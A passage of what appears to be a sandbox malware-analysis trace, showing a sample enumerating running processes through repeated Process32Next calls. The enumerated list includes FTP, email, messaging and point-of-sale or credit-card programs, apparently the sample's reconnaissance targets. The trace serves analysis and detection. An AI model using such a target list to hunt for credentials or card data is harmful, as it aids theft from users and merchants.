th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0288.287] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0288.289] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0288.291] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0288.295] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0288.297] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.299] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.301] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0288.303] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x46, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.305] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.374] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.376] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.378] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.380] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.382] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.384] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0288.387] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0288.388] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0288.390] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.392] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2e, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0288.393] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0288.395] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0288.396] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0288.397] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0288.399] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0288.400] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0288.401] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0288.404] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0288.405] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0288.406] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0288.408] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0288.409] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0288.411] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="real-new.exe")) returned 1 [0288.412] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="letter.exe")) returned 1 [0288.413] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="lightwhere.exe")) returned 1 [0288.415] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge_model_ready.exe")) returned 1 [0288.416] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fearfew.exe")) returned 1 [0288.483] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bag-begin-gas.exe")) returned 1 [0288.485] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="take whether.exe")) returned 1 [0288.486] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xd88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="common trade station.exe")) returned 1 [0288.488] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xda8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="small_money.exe")) returned 1 [0288.489] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="magazineofficialteach.exe")) returned 1 [0288.490] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="involve.exe")) returned 1 [0288.492] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdd4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="religious_free_generation.exe")) returned 1 [0288.493] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hair friend will.exe")) returned 1 [0288.496] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xdf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whose.exe")) returned 1 [0288.497] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0288.499] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0288.500] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0288.501] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0288.503] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0288.504] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0288.505] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0288.507] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0288.508] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0288.510] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0288.513] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0288.515] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0288.517] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0288.518] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0288.520] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0288.522] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0288.523] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0288.525] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0288.624] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0288.626] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0288.628] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0288.630] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0288.631] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0288.633] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0288.635] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0288.639] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0288.641] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0288.642] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0288.644] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0288.646] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0288.648] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0288.650] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0288.652] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0288.654] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0288.656] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0288.658] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0288.659] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0288.661] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0288.663] Process32Next (in: hSnapshot=0x21f8, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, 